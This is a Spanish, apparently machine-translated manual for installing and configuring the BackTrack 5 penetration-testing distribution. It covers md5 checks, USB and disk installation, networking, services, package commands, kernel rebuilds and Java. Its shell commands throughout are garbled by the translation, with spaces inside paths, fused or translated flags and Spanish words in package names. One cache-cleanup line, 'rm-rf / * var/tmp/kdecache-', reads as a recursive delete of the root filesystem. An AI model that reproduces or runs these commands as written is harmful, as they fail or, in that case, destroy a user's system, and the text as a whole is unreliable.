Manual Backtrack

108
Introducción Descarga de BackTrack - Instalación de BackTrack - Instalación de VMware Tools - Uso básico - Instalar VirtualBox Descarga de

Transcript of Manual Backtrack

Page 1: Manual Backtrack

Introducción

Descarga de BackTrack - Instalación de BackTrack - Instalación de VMware Tools - Uso básico - Instalar VirtualBox

Descarga de

Page 2: Manual Backtrack

Contenido [hide]

• 1 La descarga BackTrack

• 2 Verificación de la descarga en Linux

• 3 Verificación de la descarga en Windows

• 4 Verificación de la descarga en OSX

• 5 Notas Importantes

• 6 ¿Qué sucede después?

Descarga de BackTrack Con el lanzamiento de Backtrack 5 que ahora soportan 32 bits, 64 bits y ARM. Backtrack 5 viene con dos gestores de ventanas principales - Gnome y KDE. Usted puede optar por descargar la página ya sea una imagen VMWare o una imagen ISO de inicio (recomendado si ejecutar Backtrack desde un LiveCD o una unidad de disco duro / USB). Por favor, use nuestras réplicas oficiales para descargar BackTrack. Estos se pueden encontrar en la página de descarga . No utilice un gestor de descargas con nuestros vínculos como la descarga es muy probable que se corrompe.

Verificación de la descarga en Linux Una vez que haya descargado BackTrack5 R2, usted debe comprobar la validez del archivo descargado usando md5sum. Esto le permitirá eliminar el problema más común que enfrentan los usuarios de BackTrack - mal descargado (corrupto) archivos ISO. Para comprobar la suma MD5 de la ISO descargada, utilice el comando md5sum:

root @ bt: ~ # md5sum BT5R2-KDE-32.iso 38ff62f14cecce5c842df60cbadbdb22 BT5R2-KDE-32.iso

Page 3: Manual Backtrack

root @ bt: ~ #

BackTrack 5 R2 md5sums ISO se resumen a continuación para su comodidad.

• BT5r2-KDE-64 KDE 64bit md5sum: 6d5996df868dfe9c31aad234187ad7d0 • BT5r2-KDE-32 KDE 32bit md5sum: adb7eece8964aab083294f06aa44b625 • BT5r2-GNOME GNOME-64 de 64 bits md5sum: 4864e7cacdc35a886ef8264eb346f414 • BT5r2-GNOME GNOME-32 de 32 bits md5sum: 4ad5f359bad43bb934d59fcf6632ae1b • BT5R2-GNOME-VM-32 de 32 bits GNOME md5sum: 9a8ec2fb4bbf4a5e626cfeb8970609fd • BT5R2-GNOME-VM-64 de 64 bits GNOME md5sum: dad2f4bf1045c56c0104218fa5d68aff • BT5r3-KDE-64 KDE 64bit md5sum: 981b897b7fdf34fb1431ba84fe93249f • BT5r3-KDE-32 KDE 32bit md5sum: d324687fb891e695089745d461268576 • BT5r3-GNOME GNOME-64 de 64 bits md5sum: 8cd98b693ce542b671edecaed48ab06d • BT5r3-GNOME GNOME-32 de 32 bits md5sum: aafff8ff5b71fdb6fccdded49a6541a0

Verificación de la descarga en Windows 1. Para comprobar el md5sum de su BackTrack ISO en Windows, puede utilizar el programa

gratuito "HashCalc" herramienta de SlavaSoft HashCalc - Hash, CRC, y la calculadora HMAC 2. Una vez descargado, HashCalc abierta, desactive todas las casillas excepto md5 y cambio de

formato de datos a "archivo". 3. En el cuadro de datos en la parte derecha hay un botón con 3 puntos, haga clic en él y vaya a

donde descargó el archivo. Iso o. Bz2 y selecciónelo, haga clic en Abrir y luego en "calcular". Después de unos segundos (o más, dependiendo la velocidad de su ordenador), habrá una cadena de 32 bits junto al md5 palabra, este es el md5 de su archivo.

Compare su md5 con el hash md5 de la página de descargas. Si son los mismos, entonces su iso o bz2 es buena, si no el archivo está dañado y hay que descargarlo de nuevo.

Verificación de la descarga en OSX Abre la consola y utilice el comando md5 para calcular su BackTrack ISO md5:

revolución: ~ $ muts md5 BT5R2-GNOME-32.iso MD5 (BT5R1-GNOME-32.iso) = 49f3dda1e617cb6f4045735766839690 Revolución: ~ $ muts

Notas Importantes Los problemas más comunes encontrados con BackTrack por los recién llegados son:

1. ISO md5sum desajustes, que se traducen en problemas de azar en BackTrack. 2. Medios de comunicación de baja calidad (en el caso de los DVD), o quemar el archivo ISO a

velocidades que son demasiado altos. 3. Burning BackTrack en un DVD como un archivo en lugar de una imagen de disco.

Por favor, asegúrese de comprobar todo lo que era anterior mencionado antes de comenzar un hilo en el Foro.

Page 4: Manual Backtrack

¿Y ahora qué? El BackTrack 5 imagen ISO es de arranque, lo que significa que usted tendrá que o bien quemar el ISO en un DVD o transferirla a un dispositivo USB. Una vez hecho esto, usted será capaz de arrancar su equipo en el entorno BackTrack Live. A partir de este entorno vivo que puede seguir utilizando BackTrack o instalarlo en su disco duro utilizando una de las guías de instalación que aparecen en la página de instalación .

Introducción

Page 5: Manual Backtrack

Se instala USB - Instala Disco Duro

Nota Importante Por favor recuerde que a pesar de que proporcionan estas guías de instalación para que usted siga, no podemos ser responsables de que pierdas tu sistema operativo actualmente instalado / s o datos, ya que no puede dar cuenta de todas las combinaciones de configuración que pueda tener.

También tenga en cuenta que tendrá que adaptar cualquiera de estas guías para su entorno concreto.

BackTrack USB Instalaciones

Instalación en USB con UNetbootin

• Easy USB (en vivo o con la persistencia) Instalar usando el instalador de UNetbootin USB .

Instalación en USB con cambios permanentes

• Backtrack Persistent USB Instalación

Instalación en USB con Linux Live USB Creator

• Alternativa método de instalación para usuarios de Windows

UNetbootin USB Installer

Herramientas y Preparación

• Thumbdrive USB (USB Capacidad de la unidad mínima de 4 GB) • Backtrack 5 archivos ISO, md5sum verificado. • UNetbootin - Una herramienta para transferir una imagen ISO en una unidad USB

Page 6: Manual Backtrack

UNetbootin permite crear unidades USB de arranque en vivo para Ubuntu, Fedora y otras distribuciones de Linux sin quemar un CD. Funciona tanto en Windows como Linux. Usted puede dejar que UNetbootin descargar una de las muchas distribuciones soportadas fuera de la caja para usted, o proporcionar su propio Linux. Iso si ya ha descargado uno o su distribución preferida no está en la lista. Este método de conseguir una instalación en vivo en una unidad USB es el más simple disponible utilizando Unetbootin. Tenga en cuenta que vamos a formatear la unidad USB y borrar su contenido.

Nota: ahora se pueden guardar los cambios realizados en el sistema al reiniciar (persistencia).

• Descargue la última BackTrack iso de nuestra página de descargas BackTrack . • Descargar UNetbootin , la última versión (Linux, Windows, OSX)

• Conecte su unidad USB • Formatear la unidad USB en FAT32 • Iniciar Unetbootin y seleccione la opción "DiskImage" opción, elija un BackTrack 5 archivo ISO. • Seleccione la cantidad de espacio que se utilizará para la persistencia en MB • Seleccione la unidad USB y haga clic en "Aceptar" para crear un arranque USB BackTrack.

• Una vez reiniciado, recuerde que el nombre de usuario y la contraseña predeterminados son root / toor.

Persistent USB

Page 7: Manual Backtrack

Contenido [hide]

• 1 Herramientas necesarias y Preparación

• 2 particiones

• 3 Instalar BackTrack al Thumbdrive

• 4 Realice la unidad de inicio

• 5 Configure Persistencia

Herramientas y Preparación

• USB Thumbdrive (Mínimo 8 GB, 16 GB recomendado) • Backtrack 5 ISO archivo md5sum verificada, ni un DVD de arranque BT5 • Vmware para arrancar el iso si decide realizar todos los pasos desde el interior de una máquina

virtual como lo hice

No importa la forma que elija, pero tened en cuenta que las designaciones de unidad pueden ser diferentes para usted de lo que eran para mí.

Esto puede no ser la mejor manera de hacer esto, pero funciona. Estoy seguro de que hay una manera más elegante de hacer esto que yo pueda volver más tarde si es necesario y permite tiempo.

Particionamiento

Muestra las unidades disponibles con el comando siguiente y determinar qué unidad que desea instalar.

dmesg | egrep hd \ |. sd.

La unidad de destino tiene que ser dividido de la siguiente manera:

• La primera partición debe ser una partición primaria de no más de 3,5 GB y se puso a escribir vfat (yo he hecho esta partición más grande de lo necesario a fin de que cubra todo el iso y futuras

Page 8: Manual Backtrack

versiones). Hacer la partición activa para evitar problemas de arranque. • La segunda partición que almacena los cambios deben ocupar el resto del espacio en la memoria

USB, o tanto como usted desea asignar a los cambios de ahorro (4,5 GB en un mínimo absoluto).

Ejecute los siguientes comandos para realizar la partición.

fdisk / dev / sdb

# Utilice la letra de unidad correspondiente a su sistema. Eliminar todas las particiones existentes

Command (m for help): d Número de partición (1-4): 1

Crear la primera partición

Command (m for help): n Comando de acción e extenderse p partición primaria (1-4) p Número de partición (1-4): 1 En primer cilindro (1-522, default 1): Utilizando el valor predeterminado 1 Último cilindro, cilindros o + tamaño + {K, M, G} (1-522, por defecto 522): 3.500 M

Cree la segunda partición

Command (m for help): n Comando de acción e extenderse p partición primaria (1-4) p Número de partición (1-4): 2 En primer cilindro (193 a 522, por defecto 193): Utilizando el valor predeterminado 193 Último cilindro, cilindros o + tamaño + {K, M, G} (193-522, por defecto 522): Utilizando el valor predeterminado 522

Establezca la primera partición a vfat/fat32

Command (m for help): t Número de partición (1-4): 1 Código hexadecimal (tipo L a la lista de códigos): b Se cambió el tipo de sistema de la partición 1 a b (W95 FAT32)

Ajuste la segunda partición para Linux

Command (m for help): t Número de partición (1-4): 2 Código hexadecimal (tipo L a la lista de códigos): 83

Page 9: Manual Backtrack

Hacer la primera partición activa

Command (m for help): a Número de partición (1-4): 1

Command (m for help): w

En este punto, puede que tenga que extraer y volver a insertar el disco para que los cambios de tabla de partición para ser reconocido y para que usted sea capaz de realizar el resto de los pasos.

Dar formato a las particiones

mkfs.vfat-F 32-n BT5 / dev/sdb1 mkfs.ext3-b 4096-L casper-rw / dev/sdb2

Tenga en cuenta que la segunda partición debe ser etiquetado como casper-rw exactamente como está escrito aquí, no hay otra etiqueta va a funcionar, ni siquiera si usa tapones en su lugar.

Instalar BackTrack al Thumbdrive

Montar la primera partición que es sdb1 en este ejemplo.

mkdir / mnt/sdb1 mount / dev/sdb1 / mnt/sdb1

Copie los archivos de la ISO a la unidad USB

cd / mnt/sdb1 rsync-r / cdrom / *.

Este último paso le tomará un par de minutos para el final, quizás más, dependiendo de la velocidad de las unidades de disco y el método que está utilizando.

Hace que la unidad de arranque

En estos próximos pasos, hacemos los archivos de memoria USB de arranque y copia en su posición correcta con sus nombres correctos.

syslinux / dev/sdb1

Esto ha hecho que la unidad de arranque, pero a medida que haya archivos del isolinux con syslinux serán nombrados incorrectamente y estar en los lugares equivocados. Fácilmente podemos arreglar eso con los siguientes comandos.

cp-r isolinux syslinux cp syslinux / isolinux.cfg syslinux / syslinux.cfg cp syslinux / isolinux.bin syslinux / syslinux.bin

Page 10: Manual Backtrack

Configurar la persistencia

Para configurar los modos persistentes en las entradas que queremos, tenemos que hacer lo siguiente:

nano syslinux / syslinux.cfg

Nuestros syslinux.cfg originales se verá así:

defecto vesamenu.c32 prompt 0 Tiempo de espera 300

menú de títulos BackTrack Live CD menú splash.png fondo menú Color Título 1; 37; 44 # c0ffffff # 00000000 std

etiqueta DEFAULT BackTrack etiqueta menú Texto - Modo de arranque predeterminado del texto kernel / casper / vmlinuz append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrd.gz texto splash vga = 791 -

etiqueta STEALTH menú de etiqueta BackTrack Stealth - No activar Networking kernel / casper / vmlinuz append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrds.gz texto staticip splash vga = 791 -

FORENSICS etiqueta menú de etiquetas BackTrack Forensics - No montar el disco o Permuta kernel / casper / vmlinuz append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrdf.gz texto splash vga = 791 -

etiqueta NODRM menú de etiqueta BackTrack noDRM - No hay controladores DRM kernel / casper / vmlinuz append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrd.gz texto nomodeset splash vga = 791 -

etiqueta de depuración BackTrack etiqueta menú Debug - Modo seguro kernel / casper / vmlinuz archivos append = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrd.gz texto -

etiqueta memtest menú de etiqueta BackTrack Memtest - Run memtest kernel / isolinux / memtest añadir -

etiqueta hd menú Boot etiqueta del disco duro - arranque del primer disco duro LOCALBOOT 0x80 añadir -

En mi caso, yo sólo quería añadir un nuevo arranque por defecto, que es exactamente la misma que la

Page 11: Manual Backtrack

entrada predeterminada original con la excepción de ser mi nuevo modo persistente.

Para hacer lo mismo que usted debe hacer que su syslinux.cfg como la siguiente:

default 0 timeout vesamenu.c32 pronta 300 título del menú BackTrack Live CD fondo del menú splash.png título de menú color 1; 37; 44 # c0ffffff # 00000000 std etiqueta DEFAULT menú BackTrack persistente etiqueta de texto - Modo Texto persistente kernel de arranque / casper / vmlinuz append archivo = / cdrom / preseed / custom.seed boot = casper initrd persistente = / casper / initrd.gz texto splash vga = 791 - texto de la etiqueta etiqueta de menú BackTrack Texto - Texto de arranque en modo kernel / casper / vmlinuz append file = / cdrom / preseed / boot custom.seed = casper initrd = / casper / initrd.gz texto splash vga = 791 - STEALTH etiqueta etiqueta de menú BackTrack Stealth - No Networking habilitado kernel / casper / vmlinuz append archivo = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrds.gz texto staticip splash vga = 791 - Forensics etiqueta etiqueta de menú BackTrack Forensics - No Drive o intercambiar Monte kernel / casper / vmlinuz append archivo = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrdf.gz texto splash vga = 791 - etiqueta NODRM menú etiqueta BackTrack noDRM - No DRM Drivers kernel / casper / vmlinuz append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrd.gz texto nomodeset splash vga = 791 - debug etiqueta etiqueta de menú Debug BackTrack - kernel Modo seguro / casper / vmlinuz append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrd.gz texto - etiqueta memtest menú etiqueta BackTrack Memtest - Run memtest kernel / isolinux / memtest append - Sello de menú Boot hd etiqueta del disco duro - arrancar el primer disco duro LOCALBOOT 0x80 append -

Ahora tenemos que probar nuestra nueva modalidad persistente.

Reinicie el sistema desde un dispositivo USB y seleccione "Texto BackTrack Persistent - Boot persistente Modo Texto" o esperar a que el tiempo de espera para arrancar por defecto. Para probar la persistencia, crear un archivo en cualquier lugar en el sistema, pero una nueva carpeta o archivo de texto en el escritorio es una diferencia visual muy fácil de verificar.

Vuelva a arrancar.

Si el archivo está ahí después de un reinicio, han tenido éxito.

Método de instalación

Instrucciones para el BT5 Próximamente.

Instalaciones para discos duros

Page 12: Manual Backtrack

Instalación de BackTrack en el disco

• Cómo instalar BackTrack en disco

Arranque dual con Windows 7 BackTrack

• Cómo arranque dual BackTrack Y Windows7

Instalar BackTrack en disco

NOTA: Se recomienda que tenga un mínimo de 20 GB de espacio en disco libre para instalar Backtrack!

• Arranque el Medio Ambiente Backtrack Live. • En el indicador bash, escriba startx para entrar en la interfaz gráfica de usuario. • Haga doble clic en el Backtrack.sh de instalación en el escritorio • Vamos a pasar por el paso a paso de instalación:

• Seleccionamos nuestro idioma, en este caso Inglés y luego haga clic en el botón Adelante.

• Hemos destacado por ubicación geográfica (La Zona Región y Hora) y haga clic en Siguiente.

• Elegimos la distribución del teclado. Vamos a dejar el valor por defecto que es EE.UU. y haga clic en Siguiente.

• Ahora es el momento de particionar el disco, para una instalación de disco completo que elegir la opción "Borrar y utilizar todo el disco" y haga clic en Siguiente.

ADVERTENCIA: Algunas veces el instalador se queda bloqueado en porcentajes de diferencia, lo dejo por un tiempo, ya que seguir adelante.

Page 13: Manual Backtrack

• Pulse el botón Reiniciar ahora y disfrutar de Backtrack!

• Después del reinicio, puede iniciar sesión con el nombre de usuario root por defecto y Toor contraseña. No se olvide de cambiar esta contraseña de root por defecto con el comando passwd.

• Como se puede ver la pantalla de bienvenida desapareció después del reinicio. Para solucionarlo basta con ejecutar fix-splash, y la pantalla de bienvenida aparecerá en el siguiente arranque.

Dual Boot BackTrack Y Windows7

NOTA: El siguiente método de instalación es la más simple disponible. Lo hemos hecho en el supuesto de que usted tiene una instalación de Windows que está ocupando todo el espacio en el disco y que le gustaría cambiar el tamaño y crear particiones en el disco duro con el fin de permitir una instalación BackTrack junto a su Windows.

ADVERTENCIA: BACK-UP DE LA INSTALACIÓN DE WINDOWS PRIMERO!

• Vamos a pasar por el paso a paso de instalación: • Seleccionamos nuestro idioma, en este caso Inglés y luego haga clic en el botón Adelante.

• Hemos destacado por ubicación geográfica (La Zona Región y Hora) y haga clic en Siguiente.

• Elegimos la distribución del teclado. Vamos a dejar el valor por defecto que es EE.UU. y haga clic en Siguiente.

• Ahora es el momento de particionar el disco, para una rápida y exitosa de doble arranque de la instalación vamos a elegir la instalarlas al lado del otro, la elección entre ellos cada opción de inicio y pulse Adelante ..

Page 14: Manual Backtrack

• ADVERTENCIA: El instalador puede parar en ciertos porcentajes, se deja durante unos minutos y se reanudará.

• Pulse el botón Reiniciar ahora y disfrutar de Backtrack!

• Cuando el equipo se inicia, se le dará la opción de arrancar Backtrack o Windows. • Después del reinicio, puede iniciar sesión con el nombre de usuario root por defecto y Toor

contraseña. No se olvide de cambiar esta contraseña de root por defecto con el comando passwd. • Como se puede ver la pantalla de bienvenida desapareció después del reinicio. Para solucionarlo

basta con ejecutar fix-splash, y la pantalla de bienvenida aparecerá en el siguiente arranque.

Uso básico

Page 15: Manual Backtrack

Contenido [hide]

• 1 Inicio de sesión en BackTrack

• 2 A partir de un entorno de interfaz gráfica de usuario

• 3 X no comenzará!

• 4 Red Llegar al trabajo

• 4.1 Configuración de la IP manualmente

• 4.2 Obtener una dirección IP estática a pegarse entre rein

Page 16: Manual Backtrack

Inicio de sesión en BackTrack Una vez que la instalación de BackTrack se hace, el nombre de usuario predeterminado y la contraseña necesarios para acceder es root / toor.

NOTA: Usted no será capaz de ver la contraseña mientras la escribe.

A partir de un entorno de interfaz gráfica de usuario Una vez que haya iniciado sesión puede iniciar el entorno gráfico con el comando startx.

X no comenzará! En raras ocasiones (por ejemplo, después de una instalación de VMware Tools, o cuando se utilizan tarjetas de vídeo no compatible), X no se iniciará. Si esto sucede, usted tiene varias opciones que usted puede intentar para solucionar el problema:

• Volver a configurar el paquete del servidor X, se pueden restablecer (y muchas veces arreglarlo) Xorg configuraciones con el siguiente comando:

root @ bt: ~ # dpkg-reconfigure xserver-xorg

• Si está utilizando Backtrack 5 en x64 con KDE debería intentar lo siguiente:

root @ bt: ~ # rm / root/.kde/cache- *

NOTA: A veces, puede que tenga que eliminar también las carpetas de caché en / var / tmp ejecutando el siguiente comando:

root @ bt: ~ # rm-rf / * var/tmp/kdecache-

Obtención de redes para trabajar Si usted no ha notado aún BackTrack no se inicia con la creación de redes de forma predeterminada con el fin de aumentar su sigilo.

Configuración de la IP manualmente

Primero vamos a configurar la red manualmente. En el siguiente ejemplo vamos a suponer las siguientes direcciones y su finalidad:

Dirección IP - 192.168.1.112/24 Puerta de enlace predeterminada - 192.168.1.1 Servidor DNS - 192.168.1.1

Para configurar estos vamos a ejecutar los siguientes comandos:

root @ bt: ~ # ifconfig eth0 192.168.1.112/24 root @ bt: ~ # route add default gw 192.168.1.1 root @ bt: ~ # echo nameserver 192.168.1.1> / etc / resolv.conf

Page 17: Manual Backtrack

Obtener una dirección IP estática a pegarse entre reinicios

Estos ajustes no obstante sólo durará hasta que se reinicie, así que si queremos ahorrar entre reinicios tenemos que editar el archivo / etc / network / interfaces de esta manera:

# Este archivo describe las interfaces de red disponibles en el sistema # Y cómo activarlos. Para obtener más información, vea Interfaces (5).

# La interfaz de red de bucle invertido auto lo iface lo de bucle de retorno inet

# La interfaz de red principal auto eth0 iface eth0 inet estático dirección 192.168.1.112 máscara de red 255.255.255.0 red 192.168.1.0 difusión 192.168.1.255 gateway 192.168.1.1

Edite el archivo de según sea apropiado, continuación, tiene la de redes hecho para arriba automáticamente en tiempo de boot:

root @ bt: ~ # update-rc.d valores predeterminados de red root @ bt: ~ # / etc / init.d / networking restart

Obtener una IP de DHCP

Con el fin de obtener una IP de un servidor DHCP que puede emitir el comando dhclient <interface> de la siguiente manera:

root @ bt: ~ # dhclient eth0 Internet Systems Consortium DHCP Client v3.1.1 Copyright 2004-2008 Internet Systems Consortium. Todos los derechos reservados. Para más información, por favor visite http://www.isc.org/sw/dhcp/

Escuchando en LPF/eth0/00: 0c: 29:81:74:21 El envío de LPF/eth0/00: 0c: 29:81:74:21 El envío de Socket / fallback DHCPREQUEST de 192.168.1.112 a 255.255.255.255 eth0 en el puerto 67 DHCPACK de 192.168.1.112 desde 192.168.1.1 obligado a 192.168.1.112 - renovación en 37.595 segundos. root @ bt: ~ #

Uso de la secuencia de comandos para iniciar la red

Hay una secuencia de comandos para iniciar la red en el directorio / etc / init.d que intenta iniciar cada interfaz de escuchar en / / etc network / interfaces (usted puede quitar los que no es necesario). Para empezar se emita el siguiente comando:

root @ bt: ~ # / etc / init.d / networking inicio

Page 18: Manual Backtrack

WICD Network Manager

Otra forma de configurar su red está utilizando el Gestor de la Red WICD, usted lo puede encontrar en el menú:

Menú> Internet> Wicd Network Manager

NOTA: Tenga en cuenta que al iniciar WICD obtendrá un error:

Con el fin de deshacerse de este error se debe reiniciar Backtrack, que antes de comenzar WICD abrir un terminal y escriba lo siguiente:

root @ bt: ~ # dpkg-reconfigure wicd root @ bt: ~ # update-rc.d wicd por defecto

Ahora, después de reiniciar el error no debería ocurrir nunca más.

Cambio de la contraseña de root Como ustedes saben Backtrack viene con un nombre de usuario y contraseña por defecto (root / Tur), es importante que cambiemos la contraseña root especialmente cuando se ejecutan servicios como SSH. Podemos cambiar la contraseña con el comando passwd:

root @ bt: ~ # passwd Introduzca la nueva contraseña de UNIX: {escriba su contraseña de nuevo aquí} Vuelva a escribir la nueva contraseña UNIX: {introduzca su nueva contraseña} passwd: password updated successfully root @ bt: ~ #

Al iniciar servicios BackTrack tiene varios servicios como Apache, SSH, MySQL, VNC, etc Todos ellos están desactivados por defecto. Para iniciar un servicio como SSH, puede utilizar los scripts de inicio. Por ejemplo, para iniciar el servicio SSH:

root @ bt: ~ # sshd-generate # Específico para el servicio SSH - necesario para generar las claves SSH root @ bt: ~ # / etc / init.d / ssh inicio A partir de OpenBSD Secure Shell servidor: sshd. root @ bt: ~ # / etc / init.d / ssh stop Detención de OpenBSD Secure Shell servidor: sshd. root @ bt: ~ #

Si utiliza un servidor ssh, por primera vez en Backtrack tendrá que generar claves:

root @ bt: ~ # sshd-generate

Para activar un servicio en tiempo de arranque, puede utilizar el comando update-rc.d, por ejemplo, tener SSH inicie durante el arranque:

root @ bt: ~ # update-rc.d-f ssh por defecto Adición de arranque del sistema para / / etc init.d / ssh ... / Etc/rc0.d/K20ssh -> .. / init.d / ssh / Etc/rc1.d/K20ssh -> .. / init.d / ssh

Page 19: Manual Backtrack

/ Etc/rc6.d/K20ssh -> .. / init.d / ssh / Etc/rc2.d/S20ssh -> .. / init.d / ssh / Etc/rc3.d/S20ssh -> .. / init.d / ssh / Etc/rc4.d/S20ssh -> .. / init.d / ssh / Etc/rc5.d/S20ssh -> .. / init.d / ssh root @ bt: ~ #

Comunes comandos apt apt-get install <paquete> Descargas <paquete> y todas sus dependencias, e instala o actualiza ellos.

apt-get remove [- purge] <paquete> Elimina <paquete> y los paquetes que dependen de él. - Purge especifica que los paquetes deben ser purgados.

apt-get update Actualiza los paquetes listados en el repositorio, deben efectuarse al menos una vez a la semana.

apt-get upgrade Upgrades todos los paquetes instalados con las actualizaciones disponibles en el repositorio. debe ejecutarse una vez a la semana.

apt-get dist-upgrade [-u] Al igual que apt-get upgrade, salvo que la actualización dist-va a instalar o desinstalar paquetes para satisfacer las dependencias.

apt-cache search Búsquedas <patrón> paquetes y descripciones de <patrón>.

apt-cache <paquete> espectáculo Muestra la descripción completa de <paquete>.

apt-cache showpkg <paquete> Muestra muchos más detalles sobre <paquete>, y sus relaciones con otros paquetes.

man apt le dará más información sobre estos comandos, así como muchos de los que son de uso menos frecuente.

Comandos comunes dpkg dpkg-i <package.deb> Instala un archivo de paquete, uno que ha descargado manualmente, por ejemplo.

dpkg-c <package.deb> Muestra el contenido de un archivo <package.deb>. deb.

dpkg-i <package.deb> Extractos información del paquete de <package.deb> un archivo. deb.

dpkg-r <paquete> Quita un paquete instalado llamado <paquete>

dpkg-P <paquete> Purgas un paquete instalado llamado <paquete>. La diferencia entre eliminar y purgar es que mientras que eliminar los datos sólo se eliminan y ejecutables, purga, también se eliminan todos los archivos de configuración, además.

dpkg-L <paquete> da una lista de todos los archivos instalados por <paquete>. Ver también dpkg-c para comprobar el contenido de un archivo. Deb.

dpkg-s <paquete> Muestra información sobre el <paquete> paquete instalado. Véase también apt-cache show para ver la información del paquete en el archivo de Debian y dpkg-I para ver la información del paquete extraído de un archivo. Deb.

Page 20: Manual Backtrack

dpkg-reconfigure <paquete> Vuelve a configurar un paquete instalado

dpkg Hombre os dará más información sobre estos comandos, así como muchos de los que son de uso menos frecuente.

¿Cómo puedo encontrar más información acerca de un comando especial o el uso de programas? La mayoría de los comandos tienen lo que se llama una página de manual (página de manual) que se puede ver escribiendo:

root @ bt: ~ # man <command desea más información ON>

Otro recurso muy bueno en el uso de comandos de Linux se puede encontrar en linuxcommand.org

Algunos programas no tienen una página de manual, pero por lo general puede conseguir más información sobre su uso, escriba:

root @ bt: ~ # <Nombre Sólo el nombre del programa sin ningún arguements.

o

root @ bt: ~ # <Nombre-ayuda

o

root @ bt: ~ # <Nombre - Ayuda

o

root @ bt: ~ # <Nombre-h

Algunos programas utilizan otros métodos, pero son por lo general sólo una variación de una de las anteriores cinco comandos.

Núcleo

Actualmente no hay texto en esta página. Puedes buscar este título de página en otras páginas, o buscar en los registros relacionados .

Page 21: Manual Backtrack

¿Cómo se prepara BT5 fuentes del mismo (Vmare herramientas, conductores, etc)

De vez en cuando es posible que desee compilar el código que requiere cabeceras del núcleo (como compat-wireless o los conductores de otro tipo). Estas son las instrucciones rápidas sobre cómo hacerlo.

root @ bt: ~ # preparar-kernel-sources root @ bt: ~ # cd / usr / src / linux root @ bt: ~ # cp-rf include / genera / * include / linux /

NOTA: Es necesario estar conectado a Internet para poder descargar el paquete linux-source.

PAE kernel

Habilitar PAE en Backtrack5 R2 y R3 NOTA: No cambie ninguna otra configuración de tu kernel a menos que sepa exactamente lo que está haciendo!

• En este tutorial vamos a proceder a habilitar PAE en Backtrack5 R2.

• En primer lugar, preparar nuestro kernel y escriba el menuconfig del núcleo.

root @ bt: ~ # preparar-kernel-sources root @ bt :/ usr / src / linux # zcat / proc / config.gz>. config root @ bt :/ usr / src / linux # make menuconfig

• Después de haber lanzado las ncurses menuconfig se procede al permitir PAE que se puede encontrar en las siguientes: Processor type and features -> Soporte de memoria alta (4) -> 64 GB

• Una vez que hemos habilitado PAE del menuconfig que avancemos en la construcción de nuestro núcleo.

root @ bt :/ usr / src / linux # make guiones root @ bt :/ usr / src / linux # make preparar

Page 22: Manual Backtrack

root @ bt :/ usr / src / linux # make root @ bt :/ usr / src / linux # update-initramfs-u root @ bt: ~ # update-grub2

• Tenemos que reiniciar el sistema y compruebe si PAE está habilitado. (Ajustar la ruta de acceso al núcleo en ejecución)

root @ bt: ~ # cat / boot/config-3.2.6 | grep Highmem </ span # CONFIG_HIGHMEM64G no está configurado CONFIG_HIGHMEM = y

Habilitar b43 conductores en Backtrack5 r2

NOTA: Si cambia las opciones adicionales en las ncurses configuración sin saber cuáles son las opciones se podría romper su núcleo!

• Habilitación b43 conductores en BT5 R2 y R3 se requieren recompilar el kernel.

root @ bt: ~ # apt-get dist-upgrade root @ bt: ~ # preparar-kernel-sources root @ bt :/ usr / src / linux # zcat / proc / config.gz>. config root @ bt :/ usr / src / linux # make menuconfig

• Configurar el kernel para utilizar B43 en lugar de los controladores predeterminados brcmsmac seleccionando la opción de soporte BCMA. Para acceder a esta opción, vaya a:

Drivers de dispositivos -> Broadcom específico AMBA.

• Agregue el apoyo BCMA como módulo, y "Apoyo a BCMA en el bus PCI-host" como se muestra a continuación

• Salir del menú de configuración ncurses, y construir su paquete kernel:

root @ bt :/ usr / src / linux # make preparar root @ bt :/ usr / src / linux # make root @ bt :/ usr / src / linux # make modules_install root @ bt :/ usr / src / linux # make install root @ bt :/ usr / src / linux # update-initramfs-u root @ bt :/ usr / src / linux # update-grub2

Page 23: Manual Backtrack

Personalización de BackTrack

Preparación BT5 fuentes del kernel

Instalación de Java

Configuración FluxBox

Instalar Flash Player

Instalación de OpenCL

¿Cómo se prepara BT5 fuentes del mismo (Vmare herramientas, conductores, etc)

De vez en cuando es posible que desee compilar el código que requiere cabeceras del núcleo (como compat-wireless o los conductores de otro tipo). Estas son las instrucciones rápidas sobre cómo hacerlo.

root @ bt: ~ # preparar-kernel-sources root @ bt: ~ # cd / usr / src / linux root @ bt: ~ # cp-rf include / genera / * include / linux /

NOTA: Es necesario estar conectado a Internet para poder descargar el paquete linux-source.

Page 24: Manual Backtrack

Instalar Java

Instalar Java Este artículo fue contribuido por g0tmi1k.

• Twitter: ! https://twitter.com/ # / g0tmi1k

NOTA: Antes de instalar Java asegúrese de matar Firefox.

root @ bt: ~ # killall -9 / opt / firefox / firefox-bin

• Puede descargar Java desde el oficial sitio web . (Descargar versión tar.gz) • En primer lugar, crear el directorio java y lugar allí:

root @ bt: ~ # mkdir / opt / java root @ bt: ~ # mv-f jre1.7.0_05 / / opt / java /

• Cambios finales.

root @ bt: ~ # update-alternatives - install / usr / bin / java java / opt/java/jre1.7.0_05/bin/java 1 root @ bt: ~ # update-alternatives - set java / opt/java/jre1.7.0_05/bin/java

• Adición del complemento para Firefox.

root @ bt: ~ # ln-sf / opt/java/jre1.7.0_05/lib/i386/libnpjp2.so / usr / lib / mozilla / plugins / root @ bt: ~ # export JAVA_HOME = "/ opt/java/jre1.7.0_05/bin/java"

• Probando el plugin.

root @ bt: ~ # firefox http://java.com/en/download/testjava.jsp

Instalar Fluxbox

Page 25: Manual Backtrack

Instalación FluxBox en BackTrack5

Ahora bien, si usted no lo sabía ya, además de Gnome y KDE BackTrack5 también viene con un gestor de ventanas más ligero llamado FluxBox, para más información, puede visitar su página oficial . Conseguir FluxBox en BackTrack5 es bonito, incluso el menú BackTrack se generan automáticamente, así que vamos a seguir adelante con ella!

• En primer lugar tenemos que instalar el paquete de flujo para la espalda, que se agarra todo lo que necesitamos para conseguir FluxBox funcionamiento.

root @ bt: ~ # apt-get install flujo para la espalda

• Después de que el script está instalado, veremos que iniciará automáticamente la configuración de Fluxbox.

